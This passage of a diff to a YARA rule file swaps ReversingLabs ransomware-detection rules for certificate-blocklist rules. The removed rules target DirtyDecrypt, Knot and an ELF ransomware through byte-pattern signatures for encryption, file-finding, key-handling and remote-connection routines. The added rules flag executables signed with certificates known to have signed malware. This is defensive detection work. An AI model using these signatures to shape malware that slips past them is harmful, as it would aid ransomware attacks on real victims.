-            0F 1F 40 ?? 48 89 D9 8B 11 48 83 C1 ?? 8D 82 ?? ?? ?? ?? F7 D2 21 D0 25 ?? ?? ?? ??
-            74 ?? 89 C2 C1 EA ?? A9 ?? ?? ?? ?? 0F 44 C2 48 8D 51 ?? 48 0F 44 CA 00 C0 48 83 D9
-            ?? C7 01 ?? ?? ?? ?? 66 C7 41 ?? ?? ?? E9 ?? ?? ?? ?? 66 2E 0F 1F 84 00 ?? ?? 00 00
-            4D 85 E4 74 ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5D 41 5C 41 5D 41 5E
-            41 5F C3
-        }
-
 	condition:
-		uint32( 0 ) == 0x464C457F and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( $drop_ransom_note ) and ( all of ( $kill_virtual_machines_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LivePlex Corp" and pe.signatures [ i ] . serial == "1c:aa:0d:0d:ad:f3:2a:24:04:a7:51:95:ae:47:82:0a" and 1324425600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Win32_Ransomware_Dirtydecrypt : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Cert_Blocklist_140D2C515E8Ee9739Bb5F1B2637Dc478 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects DirtyDecrypt ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f4d69c3e-a082-5bc9-bf72-4cc330d3de74"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "69f3ee46-87d2-5630-ba7c-4ed2924cf650"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.DirtyDecrypt.yara#L3-L112"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16284-L16300"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "eb6a1c376b0739848b523e741d0d1ebdbc87056d51931fb94c744aa094d6479f"
+		logic_hash = "e6724fe80959592c8741621ce604518d3e964cee5941257a99dda78b9c8bbdac"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "DirtyDecrypt"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$dd_ep = {
-            55 8B EC 83 EC ?? E8 ?? ?? ?? ?? 85 C0 0F 84 BF 00 00 00 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74
-            1F 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 07 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB
-            09 8B 4D ?? 83 C1 ?? 89 4D ?? 83 7D ?? ?? 73 15 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 89 44 95 ?? EB DC 6A ?? 68
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ??
-            8B 15 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 6A ?? 6A ?? 6A
-            ?? 8D 55 ?? 52 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 33 C0 8B E5 5D C2 ?? ??
-        }
-		$dd_hash = {
-            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 0F 84 D5 00 00 00 83 7D ?? ?? 0F 84 CB 00 00 00 83 7D ?? ?? 0F 84 C1
-            00 00 00 83 7D ?? ?? 0F 84 B7 00 00 00 83 7D ?? ?? 0F 84 AD 00 00 00 83 7D ?? ?? 0F 84 A3 00 00 00 C7 45 ?? ?? ?? ?? ??
-            8D 45 ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 85 C0 75 02 EB 6F 83 7D ?? ?? 76 2A 6A ?? 6A ?? 8B
-            55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 02 EB 51 8B 4D ?? 83 E9 ?? 89 4D ?? 8B 55 ?? 83 C2 ?? 89 55 ?? 6A ?? 8B
-            45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 02 EB 25 6A ?? 6A ?? 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B
-            45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 33 C9 0F 85 74 FF FF FF 83 7D ?? ?? 74 0A 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 8B
-            E5 5D C2 ?? ??
-        }
-		$dd_getkey = {
-            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 31 C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8D 4D ?? 51 6A ?? 8B 55
-            ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 07 C7 45 ?? ?? ?? ?? ?? 8B 45 ?? C1 E8 ?? 89 45 ?? 8B 45 ?? 8B E5 5D C2 ?? ??
-        }
-		$dd_destroykey = {
-            55 8B EC 83 7D ?? ?? 74 0A 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 5D C2
-        }
-		$dd_importkey = {
-            55 8B EC 51 C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 6A ?? 8B 4D ?? 8B 51 ?? 52 8B 45 ?? 8B 08 51 8B 55 ?? 52 FF 15 ?? ??
-            ?? ?? 8B 45 ?? 8B E5 5D C2 ?? ??
-        }
-		$dd_decrypt = {
-            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 0F 84 22 01 00 00 83 7D ?? ?? 0F 84 18 01 00 00 83 7D ?? ?? 0F 84 0E
-            01 00 00 83 7D ?? ?? 0F 84 04 01 00 00 83 7D ?? ?? 0F 84 FA 00 00 00 8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 33 D2
-            F7 75 ?? 0F AF 45 ?? 89 45 ?? 8B 4D ?? 89 4D ?? 8B 55 ?? 8B 02 03 45 ?? 89 45 ?? 8B 4D ?? 8B 11 03 55 ?? 52 8B 45 ?? 8B
-            08 51 6A ?? E8 ?? ?? ?? ?? 8B 55 ?? 89 02 8B 45 ?? 83 38 ?? 0F 84 A7 00 00 00 8B 4D ?? 8B 11 8B 45 ?? 03 10 89 55 ?? 83
-            7D ?? ?? 74 61 6A ?? 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 45 ??
-            89 45 ?? 8D 4D ?? 51 8B 55 ?? 52 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 02 EB 1D 8B 4D ?? 03 4D ?? 89
-            4D ?? 8B 55 ?? 2B 55 ?? 89 55 ?? 8B 45 ?? 03 45 ?? 89 45 ?? EB 99 83 7D ?? ?? 75 15 8B 4D ?? 89 4D ?? 8B 55 ?? 8B 45 ??
-            2B 02 8B 4D ?? 89 01 EB 18 8B 55 ?? 8B 02 50 8B 4D ?? 8B 11 52 6A ?? E8 ?? ?? ?? ?? 8B 4D ?? 89 01 8B 45 ?? 8B E5 5D C2
-            ?? ??
-        }
-		$dd_encrypt = {
-            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 0F 84 89 01 00 00 83 7D ?? ?? 0F 84 7F 01 00 00 83 7D ?? ?? 0F 84 75
-            01 00 00 83 7D ?? ?? 0F 84 6B 01 00 00 83 7D ?? ?? 0F 84 61 01 00 00 8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 8B 4D ?? 83 E9
-            ?? 89 4D ?? 8B 55 ?? 89 55 ?? 6A ?? 8D 45 ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 85 C0 0F 84 26 01
-            00 00 8B 55 ?? 3B 55 ?? 76 08 8B 45 ?? 89 45 ?? EB 06 8B 4D ?? 89 4D ?? 8B 55 ?? 89 55 ?? 8B 45 ?? 33 D2 F7 75 ?? 0F AF
-            45 ?? 8B 4D ?? 8B 11 03 D0 03 55 ?? 89 55 ?? 8B 45 ?? 50 8B 4D ?? 8B 11 52 6A ?? E8 ?? ?? ?? ?? 8B 4D ?? 89 01 8B 55 ??
-            83 3A ?? 0F 84 CF 00 00 00 8B 45 ?? 8B 08 8B 55 ?? 03 0A 89 4D ?? 83 7D ?? ?? 0F 84 84 00 00 00 8B 45 ?? 3B 45 ?? 73 08
-            8B 4D ?? 89 4D ?? EB 06 8B 55 ?? 89 55 ?? 8B 45 ?? 89 45 ?? 6A ?? 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B
-            4D ?? 89 4D ?? 8B 55 ?? 52 8D 45 ?? 50 8B 4D ?? 51 6A ?? 6A ?? 6A ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 02 EB 2D 8B
-            45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 55 ?? 03 55 ?? 89 55 ?? 8B 45 ?? 2B 45 ?? 89 45 ?? 8B 4D ?? 03 4D ?? 89 4D ?? E9
-            72 FF FF FF 83 7D ?? ?? 75 16 8B 55 ?? 8B 45 ?? 2B 02 8B 4D ?? 89 01 C7 45 ?? ?? ?? ?? ?? EB 18 8B 55 ?? 8B 02 50 8B 4D
-            ?? 8B 11 52 6A ?? E8 ?? ?? ?? ?? 8B 4D ?? 89 01 8B 45 ?? 8B E5 5D C2 ?? ??
-        }
-		$dd_provparam = {
-            55 8B EC 83 EC ?? 83 7D ?? ?? 0F 84 94 00 00 00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 6A ?? 6A ??
-            8B 4D ?? 51 FF 15 ?? ?? ?? ?? 85 C0 74 3F 8B 55 ?? 83 C2 ?? 52 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 2A 6A ?? 8D 45 ??
-            50 8B 4D ?? 51 6A ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 10 8B 45 ?? 50 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8B
-            4D ?? 51 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 74 1D 6A ?? 6A ?? 6A ?? 8B 55 ?? 52 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 E8
-            ?? ?? ?? ?? 8B E5 5D C2 ?? ??
-        }
-		$dd_acquirecontext = {
-            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 0B 8B 45 ?? 0D ?? ?? ?? ?? 89 45 ?? C7 45 ??
-            ?? ?? ?? ?? 83 7D ?? ?? 75 07 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 03 45 ?? 50 6A ?? 6A ?? 6A ?? 8D 4D ?? 51 E8 ?? ?? ??
-            ?? 8B 55 ?? 52 6A ?? 8B 45 ?? 50 8D 4D ?? 51 8D 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 39 8B 45 ?? 83 C8 ?? 50 6A ?? 8B 4D
-            ?? 51 8D 55 ?? 52 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 1A 6A ?? 6A ?? 6A ?? 8D 4D ?? 51 8D 55 ?? 52 FF 15 ?? ?? ?? ??
-            85 C0 75 02 EB 0E 6A ?? FF 15 ?? ?? ?? ?? 83 7D ?? ?? 74 9D 8B 45 ?? 8B E5 5D C2 ?? ??
-        }
-		$dd_mrwhite = {
-            55 8B EC 81 EC ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 0F 84 64 01 00 00 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8D
-            85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 12 83 3D ?? ?? ?? ?? ?? 74 09 83 3D ?? ?? ?? ?? ?? 75 05 E9 13
-            01 00 00 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 85 C0 75 05 E9 F0 00 00 00 8B 95
-            ?? ?? ?? ?? 52 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74
-            05 E9 C0 00 00 00 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 85 C0 74 09 83 BD ?? ?? ?? ?? ?? 73 05 E9 9B
-            00 00 00 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0
-            75 02 EB 72 8B 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 02 83 C0 ?? 3B 85 ?? ?? ?? ?? 76 02 EB 51 8B 8D ??
-            ?? ?? ?? 83 39 ?? 74 3E 0F B7 95 ?? ?? ?? ?? 83 FA ?? 75 32 8B 85 ?? ?? ?? ?? 8B 08 51 8B 95 ?? ?? ?? ?? 83 C2 ?? 52 6A
-            ?? 8D 85 ?? ?? ?? ?? 50 8B 0D ?? ?? ?? ?? 51 8B 15 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 89 45 ?? 33 C0 0F 85 CD FE FF FF 8D 8D
-            ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8B 45 ?? 8B E5 5D C2 ?? ??
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $dd_ep at pe.entry_point ) and $dd_hash and $dd_getkey and $dd_destroykey and $dd_importkey and $dd_decrypt and $dd_encrypt and $dd_provparam and $dd_acquirecontext and $dd_mrwhite
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Guangzhou YuanLuo Technology Co.,Ltd" and pe.signatures [ i ] . serial == "14:0d:2c:51:5e:8e:e9:73:9b:b5:f1:b2:63:7d:c4:78" and 1386806400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Knot : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_58015Acd501Fc9C344264Eace2Ce5730 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Knot ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4dfe9da5-7ab1-57dc-95fc-b05777f235b8"
-		date = "2021-03-19"
-		modified = "2021-03-19"
+		id = "28a56bcf-1f13-5478-a6d5-7595464da198"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Knot.yara#L1-L118"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16302-L16318"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "a7a3e13139d68314e583ec225a5d56373a551e67d46984dcf9a228a1f7275f14"
+		logic_hash = "7c1bec5059d40fc326bb08775888ed169abc746228eeb42c897f479992c5acab"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Knot"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? 50
-            FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 32 C0 E9 ?? ?? ?? ?? 6A ?? 8B 4D ?? 51
-            FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 32 C0 E9 ?? ?? ?? ?? 6A ?? 6A ?? 6A ??
-            6A ?? 6A ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 32 C0 E9 ?? ??
-            ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75
-            ?? 32 C0 E9 ?? ?? ?? ?? 8D 4D ?? 51 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 52
-            FF 15 ?? ?? ?? ?? 85 C0 75 ?? 32 C0 E9 ?? ?? ?? ?? 6A ?? 8B 45 ?? 50 8B 4D ?? 51 8B
-            55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 32 C0 E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 85
-            C0 75 ?? 32 C0 E9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15
-            ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 32 C0 E9 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 6A ?? 6A ?? 6A ?? 8B 55 ?? 52 FF 15
-        }
-		$encrypt_files_p2 = {
-            85 C0 75 ?? 32 C0 E9 ?? ?? ?? ?? 8B 45 ?? 50 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF
-            15 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 95
-            ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 6A
-            ?? 8D 95 ?? ?? ?? ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 8B
-            95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 8B 55 ?? 52 6A
-            ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74
-            ?? 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 8B 45 ?? 50 8B 4D
-            ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 95 ?? ?? ?? ?? 52 8B 45 ?? 50 8B 8D ?? ?? ??
-            ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF 15
-            ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51
-            FF 15 ?? ?? ?? ?? B0 ?? 8B E5 5D C3
-        }
-		$find_files_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? C6 85
-            ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ??
-            ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 0F B7 8D ?? ?? ?? ?? 83 F9 ?? 0F 84 ?? ??
-            ?? ?? 8B 95 ?? ?? ?? ?? 83 E2 ?? 89 95 ?? ?? ?? ?? 74 ?? 8D 85 ?? ?? ?? ?? 50 FF 15
-            ?? ?? ?? ?? 83 F8 ?? 75 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF 15
-            ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ??
-            8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95
-            ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ??
-            ?? ?? 83 C4 ?? 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ??
-            ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? C7 85 ?? ?? ?? ??
-            ?? ?? ?? ?? EB ?? 8B 8D ?? ?? ?? ?? 83 C1 ?? 89 8D ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ??
-            73 ?? 8B 95 ?? ?? ?? ?? 8B 04 95 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ??
-            83 C4 ?? 85 C0 74 ?? C6 85 ?? ?? ?? ?? ?? EB ?? 0F B6 95 ?? ?? ?? ?? 83 FA ?? 75
-        }
-		$find_files_p2 = {
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? 8B 85 ?? ?? ?? ?? 83 C0 ?? 89 85 ?? ?? ?? ?? 83
-            BD ?? ?? ?? ?? ?? 73 ?? 8B 8D ?? ?? ?? ?? 8B 14 8D ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ??
-            50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? C6 85 ?? ?? ?? ?? ?? EB ?? 0F B6 8D ?? ?? ??
-            ?? 83 F9 ?? 0F 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ??
-            ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 83 C4 ?? 68 ?? ??
-            ?? ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ??
-            ?? ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
-            68 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B 95 ??
-            ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ??
-            ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ??
-            ?? 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50
-            E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ??
-            8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ??
-            51 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ??
-            8B E5 5D C3
-        }
-		$remote_connection = {
-            55 8B EC 81 EC ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A
-            ?? FF 15 ?? ?? ?? ?? 89 45 ?? FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 ?? 6A ?? FF 15 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 0F B6 C0 83 F8 ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 0F B6 C8 83 F9 ?? 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 E8
-            ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? FF 15 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 99 B9 ?? ?? ?? ?? F7 F9 81 C2 ?? ?? ?? ?? 52 8D 95 ?? ?? ?? ??
-            52 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 8D 8D
-            ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 E8 ??
-            ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8D 85 ?? ?? ?? ?? 50
-            FF 15 ?? ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 6A ??
-            6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? 8B 95 ?? ??
-            ?? ?? 83 C2 ?? 89 95 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7F ?? 8D 85 ?? ?? ?? ?? 50 8B
-            8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 8B
-            85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 83 BD ?? ?? ?? ?? ?? 74
-            ?? EB ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 8D 95 ?? ?? ?? ?? 52
-            E8 ?? ?? ?? ?? 83 C4 ?? EB ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF
-            15 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 6A ?? FF 15 ?? ?? ?? ?? 33 C0 8B E5 5D C2
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( $remote_connection )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Nanjing Ranyi Technology Co., Ltd. " and pe.signatures [ i ] . serial == "58:01:5a:cd:50:1f:c9:c3:44:26:4e:ac:e2:ce:57:30" and 1352246400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Reveton : TC_DETECTION MALICIOUS MALWARE FILE
+
